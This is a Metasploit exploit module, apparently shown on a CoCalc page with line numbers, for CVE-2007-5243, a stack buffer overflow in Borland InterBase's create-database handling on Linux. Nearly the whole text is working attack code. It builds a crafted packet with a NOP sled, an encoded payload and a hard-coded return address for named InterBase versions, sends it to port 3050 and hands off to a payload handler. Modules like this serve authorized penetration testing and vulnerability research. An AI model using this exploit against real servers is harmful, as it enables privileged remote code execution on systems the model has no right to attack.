CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'		=> 'Borland InterBase jrd8_create_database() Buffer Overflow',
14
      'Description'	=> %q{
15
        This module exploits a stack buffer overflow in Borland InterBase
16
        by sending a specially crafted create request.
17
      },
18
      'Author'	=>
19
        [
20
          'Ramon de C Valle',
21
          'Adriano Lima <adriano[at]risesecurity.org>',
22
        ],
23
      'Arch'		=> ARCH_X86,
24
      'Platform'	=> 'linux',
25
      'References'	=>
26
        [
27
          [ 'CVE', '2007-5243' ],
28
          [ 'OSVDB', '38606' ],
29
          [ 'BID', '25917' ],
30
          [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],
31
        ],
32
      'Privileged'	=> true,
33
      'License'	=> MSF_LICENSE,
34
      'Payload'	=>
35
        {
36
          'Space' => 128,
37
          'BadChars' => "\x00\x2f\x3a\x40\x5c",
38
        },
39
      'Targets'	=>
40
        [
41
          # 0x0804cbe4 pop esi; pop ebp; ret
42
          [
43
            'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253',
44
            { 'Ret' => 0x0804cbe4 }
45
          ],
46
        ],
47
      'DefaultTarget'	=> 0,
48
      'DisclosureDate'  => '2007-10-03'
49
    ))
50

51
    register_options(
52
      [
53
        Opt::RPORT(3050)
54
      ],
55
      self.class
56
    )
57

58
  end
59

60
  def exploit
61

62
    connect
63

64
    # Create database
65
    op_create = 20
66

67
    length = 544
68
    remainder = length.remainder(4)
69
    padding = 0
70

71
    if remainder > 0
72
      padding = (4 - remainder)
73
    end
74

75
    buf = ''
76

77
    # Operation/packet type
78
    buf << [op_create].pack('N')
79

80
    # Id
81
    buf << [0].pack('N')
82

83
    # Length
84
    buf << [length].pack('N')
85

86
    # It will return into this nop block
87
    buf << make_nops(length - payload.encoded.length - 4)
88

89
    # Payload
90
    buf << payload.encoded
91

92
    # Target
93
    buf << [target.ret].pack('V')
94

95
    # Padding
96
    buf << "\x00" * padding
97

98
    # Database parameter block
99

100
    # Length
101
    buf << [1024 * 32].pack('N')
102

103
    # Random alpha data
104
    buf << rand_text_alpha(1024 * 32)
105

106
    sock.put(buf)
107

108
    handler
109

110
  end
111
end
112

113